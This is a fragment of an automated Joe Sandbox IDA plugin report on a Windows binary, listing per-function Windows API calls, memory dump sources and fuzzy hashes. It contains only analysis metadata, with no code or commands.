                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DD1DE1
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1DF2
                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00DD1E8C
                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00DD1EDB
                                                                                                            • _strlen.LIBCMT ref: 00DD1F35
                                                                                                              • Part of subcall function 00DB39E8: _strlen.LIBCMT ref: 00DB39F2
                                                                                                              • Part of subcall function 00D56D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00D6CF58,?,?,?), ref: 00D56DBA
                                                                                                              • Part of subcall function 00D56D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00D6CF58,?,?,?), ref: 00D56DED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1923757996-0
                                                                                                            • Opcode ID: d0632857c81e7e4d2a9706e0c8842f8bd6e80f974e40e9b2931865269c769b33
                                                                                                            • Instruction ID: 5190e6446e30402c794598193347099465c04215c15e41e2c15ce12a48fa23c1
                                                                                                            • Opcode Fuzzy Hash: d0632857c81e7e4d2a9706e0c8842f8bd6e80f974e40e9b2931865269c769b33
                                                                                                            • Instruction Fuzzy Hash: 7DA19035604340AFC724DF24C895E2ABBA5EF84318F58494DF8565B3A2DB31ED46CBB1
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D782D9,00D782D9,?,?,?,00D8644F,00000001,00000001,8BE85006), ref: 00D86258
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D8644F,00000001,00000001,8BE85006,?,?,?), ref: 00D862DE
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D863D8
                                                                                                            • __freea.LIBCMT ref: 00D863E5
                                                                                                              • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            • __freea.LIBCMT ref: 00D863EE
                                                                                                            • __freea.LIBCMT ref: 00D86413
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1414292761-0
                                                                                                            • Opcode ID: 6b586866f7091c967702e5322f95a5b25cc2a309b1ce13d7a2094d067d74b4e1
                                                                                                            • Instruction ID: 64eb7785d345388dfc3f44ee98af13390d49faa87220879d1692ae5eefd5c400
                                                                                                            • Opcode Fuzzy Hash: 6b586866f7091c967702e5322f95a5b25cc2a309b1ce13d7a2094d067d74b4e1
                                                                                                            • Instruction Fuzzy Hash: 9451B172600216ABEB25AF64DC81EBF77AAEB44B60F1D4669FC05D6140EB34DC54C770
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
                                                                                                              • Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDBCCA
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDBD25
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00DDBD6A
                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DDBD99
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DDBDF3
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00DDBDFF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1120388591-0
                                                                                                            • Opcode ID: 3be646b4555baa7d79a7be60b7b6e7d8731f07f400b6f9cebb8d1679f62f4bdc
                                                                                                            • Instruction ID: 48e6494dfcdbba07f3badee41bda5920edd467abf63549df4fbaec38d72a80d2
                                                                                                            • Opcode Fuzzy Hash: 3be646b4555baa7d79a7be60b7b6e7d8731f07f400b6f9cebb8d1679f62f4bdc
                                                                                                            • Instruction Fuzzy Hash: AD816E30118241EFD714DF24C895E2ABBE5FF84318F15495EF8968B2A2DB31ED45CBA2
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 00DAF7B9
                                                                                                            • SysAllocString.OLEAUT32(00000001), ref: 00DAF860
                                                                                                            • VariantCopy.OLEAUT32(00DAFA64,00000000), ref: 00DAF889
                                                                                                            • VariantClear.OLEAUT32(00DAFA64), ref: 00DAF8AD
                                                                                                            • VariantCopy.OLEAUT32(00DAFA64,00000000), ref: 00DAF8B1
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DAF8BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3859894641-0
                                                                                                            • Opcode ID: 7fb3373eda2f57db403dd5c976eb1cd5cc9555fba2915eea3607d5893761ad7a
                                                                                                            • Instruction ID: 2e359096ef1e8296f2bdaeee60ead2d3d05aad763a5bdaf61dcf3fbe77e67b3d
                                                                                                            • Opcode Fuzzy Hash: 7fb3373eda2f57db403dd5c976eb1cd5cc9555fba2915eea3607d5893761ad7a
                                                                                                            • Instruction Fuzzy Hash: 9051B632500310ABCF24ABA5D895B2EB3A4EF46310F2458A6EC05DF291DB74DC41CBB6
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00DC94E5
                                                                                                            • _wcslen.LIBCMT ref: 00DC9506
                                                                                                            • _wcslen.LIBCMT ref: 00DC952D
                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00DC9585
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                            • String ID: X
                                                                                                            • API String ID: 83654149-3081909835
                                                                                                            • Opcode ID: d806cca67698ba20946dfb920585caa3318c0b41ef0f9eca5a6b59e79edc4cbf
                                                                                                            • Instruction ID: 44c9d4535e5495af856743e89d1dbb90d65a28fa57b24fb11cd46127feea7167
                                                                                                            • Opcode Fuzzy Hash: d806cca67698ba20946dfb920585caa3318c0b41ef0f9eca5a6b59e79edc4cbf
                                                                                                            • Instruction Fuzzy Hash: 20E16C315083418FDB14DF24C895B6AB7E4FF85314F18896DE8999B2A2EB31DD05CBB2
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00D69241
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00D692A5
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00D692C2
                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D692D3
                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00D69321
                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DA71EA
                                                                                                              • Part of subcall function 00D69339: BeginPath.GDI32(00000000), ref: 00D69357
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                            • String ID:
                                                                                                            • API String ID: 3050599898-0
                                                                                                            • Opcode ID: bbe59637f746425fee1ac5dd658619885684867f41f99c0407612337f1475b47
                                                                                                            • Instruction ID: edbddc9e2ef42afc3db044b45da36b69593c46ac179b914657322c90de38a24e
                                                                                                            • Opcode Fuzzy Hash: bbe59637f746425fee1ac5dd658619885684867f41f99c0407612337f1475b47
                                                                                                            • Instruction Fuzzy Hash: C041AE70104340AFD721DF25DCA4FAABBA8EB9A320F040669F995DB2A1C7309946DB71
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DC080C
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DC0847
                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00DC0863
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00DC08DC
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DC08F3
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DC0921
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 3368777196-0
                                                                                                            • Opcode ID: ad271890c36c8fe679660728edd0bc54509651c12d72a354d275eca38f021c0b
                                                                                                            • Instruction ID: 4d988c9a1988c00d5c68bbe57751b524c2bd2938a23b60a57660fdb30e142364
                                                                                                            • Opcode Fuzzy Hash: ad271890c36c8fe679660728edd0bc54509651c12d72a354d275eca38f021c0b
                                                                                                            • Instruction Fuzzy Hash: 1B413871900205EBDF14AF54DC85AAA7BB8FF04310B1480A9E904AF297DB31DE65DBB4
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DAF3AB,00000000,?,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DE824C
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00DE8272
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DE82D1
                                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 00DE82E5
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 00DE830B
                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DE832F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 642888154-0
                                                                                                            • Opcode ID: 9b919538a6bae4043748f840f96a556a0b8cc2d1405cf964b13dad4fb58c1ed4
                                                                                                            • Instruction ID: 825fc59928a8278142d85e39dfb993634088070825b7c4cf6d213f509f809ad0
                                                                                                            • Opcode Fuzzy Hash: 9b919538a6bae4043748f840f96a556a0b8cc2d1405cf964b13dad4fb58c1ed4
                                                                                                            • Instruction Fuzzy Hash: A241D730601680AFDB25EF16C895BE47BE0FB46715F1C11A8E60C9F272C7325846DB74
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00DB4C95
                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DB4CB2
                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DB4CEA
                                                                                                            • _wcslen.LIBCMT ref: 00DB4D08
                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DB4D10
                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00DB4D1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                            • String ID:
                                                                                                            • API String ID: 72514467-0
                                                                                                            • Opcode ID: df99513bad384227cabf2bafd92b00d45633ba1a19558d8d48850058ffcd7267
                                                                                                            • Instruction ID: c310a953810a0b85fc78940a775383c05f50ad105b238d6283557fb8d43d7f19
                                                                                                            • Opcode Fuzzy Hash: df99513bad384227cabf2bafd92b00d45633ba1a19558d8d48850058ffcd7267
                                                                                                            • Instruction Fuzzy Hash: 8D21CC72604240BBEB159B35EC45EBB7FACDF45750F14802DF80ACA193EA61DC4196B0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
                                                                                                            • _wcslen.LIBCMT ref: 00DC587B
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DC5995
                                                                                                            • CoCreateInstance.OLE32(00DEFCF8,00000000,00000001,00DEFB68,?), ref: 00DC59AE
                                                                                                            • CoUninitialize.OLE32 ref: 00DC59CC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 3172280962-24824748
                                                                                                            • Opcode ID: cd50a6a33cb2ea7675c03b47444924566ca7d003c79b519bdd6c51affb8ed04c
                                                                                                            • Instruction ID: d37861dc72a40697bad76cd1894dc628f9d5d80da316113b522dd0fe2cb37088
                                                                                                            • Opcode Fuzzy Hash: cd50a6a33cb2ea7675c03b47444924566ca7d003c79b519bdd6c51affb8ed04c
                                                                                                            • Instruction Fuzzy Hash: 03D155756047029FCB14DF14D480E2ABBE2EF89714F14899DF8899B361DB31ED85CBA2
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DB0FCA
                                                                                                              • Part of subcall function 00DB0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DB0FD6
                                                                                                              • Part of subcall function 00DB0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DB0FE5
                                                                                                              • Part of subcall function 00DB0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DB0FEC
                                                                                                              • Part of subcall function 00DB0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DB1002
                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00DB1335), ref: 00DB17AE
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DB17BA
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00DB17C1
                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00DB17DA
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00DB1335), ref: 00DB17EE
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB17F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                            • String ID:
                                                                                                            • API String ID: 3008561057-0
                                                                                                            • Opcode ID: 0ab814228c6f585150b7de7d45a260898d654958581c4feed0c02501ea22ee49
                                                                                                            • Instruction ID: e71ab966bfea2f59b4d89bd4095f148d68cf5fec1b93c9759020673a7ef8e3d8
                                                                                                            • Opcode Fuzzy Hash: 0ab814228c6f585150b7de7d45a260898d654958581c4feed0c02501ea22ee49
                                                                                                            • Instruction Fuzzy Hash: C5116A36A10305EBDB10AFA4CC99BEE7BA9FB46355F944018F882DB210DB35A945CB70
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DB14FF
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00DB1506
                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00DB1515
                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 00DB1520
                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DB154F
                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00DB1563
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                            • String ID:
                                                                                                            • API String ID: 1413079979-0
                                                                                                            • Opcode ID: 2ac1cf5dc52ceeaaa573f8e60c0180d1e71d96f6dcb1ad05e7d7e3200171cc87
                                                                                                            • Instruction ID: 6d8ba7afc2439370a7ee5dab8bb09fb2fa5f627cf825825b41079d25e7fe60b7
                                                                                                            • Opcode Fuzzy Hash: 2ac1cf5dc52ceeaaa573f8e60c0180d1e71d96f6dcb1ad05e7d7e3200171cc87
                                                                                                            • Instruction Fuzzy Hash: 04114476500249EBDB12DFA8DD89BDE7BA9FB48704F484025FA06A6160C371CE619B70
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00D73379,00D72FE5), ref: 00D73390
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D7339E
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D733B7
                                                                                                            • SetLastError.KERNEL32(00000000,?,00D73379,00D72FE5), ref: 00D73409
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 1297699ab1ef36453d2fe078b74ecfa1e766004f0eda104d5f610be46d98202c
                                                                                                            • Instruction ID: b86bc634accfd5391748dbe039e8b2b24ae9e1fbd1c5af735d31f448cca1b7da
                                                                                                            • Opcode Fuzzy Hash: 1297699ab1ef36453d2fe078b74ecfa1e766004f0eda104d5f610be46d98202c
                                                                                                            • Instruction Fuzzy Hash: 61012432248311BEA7253BB9BC859AB2A95EB09379330C22AF418D42F0FF114D067674
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00D85686,00D93CD6,?,00000000,?,00D85B6A,?,?,?,?,?,00D7E6D1,?,00E18A48), ref: 00D82D78
                                                                                                            • _free.LIBCMT ref: 00D82DAB
                                                                                                            • _free.LIBCMT ref: 00D82DD3
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00D7E6D1,?,00E18A48,00000010,00D54F4A,?,?,00000000,00D93CD6), ref: 00D82DE0
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,00D7E6D1,?,00E18A48,00000010,00D54F4A,?,?,00000000,00D93CD6), ref: 00D82DEC
                                                                                                            • _abort.LIBCMT ref: 00D82DF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: cbb1abd6b149e8ae263440cebc5551bb4d7e9766afcd677a4b31fc247a9047c0
                                                                                                            • Instruction ID: f6fa67f2cd784dcadd1990afb987f326d56ae261fc52fbce2ed4cf61e5092ceb
                                                                                                            • Opcode Fuzzy Hash: cbb1abd6b149e8ae263440cebc5551bb4d7e9766afcd677a4b31fc247a9047c0
                                                                                                            • Instruction Fuzzy Hash: 71F0C8366856003BC6123739BC06F7B2969EFC17B1F294418F828E62D2EF249C0243B1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
                                                                                                              • Part of subcall function 00D69639: BeginPath.GDI32(?), ref: 00D696B9
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696E2
                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00DE8A4E
                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00DE8A62
                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00DE8A70
                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00DE8A80
                                                                                                            • EndPath.GDI32(?), ref: 00DE8A90
                                                                                                            • StrokePath.GDI32(?), ref: 00DE8AA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
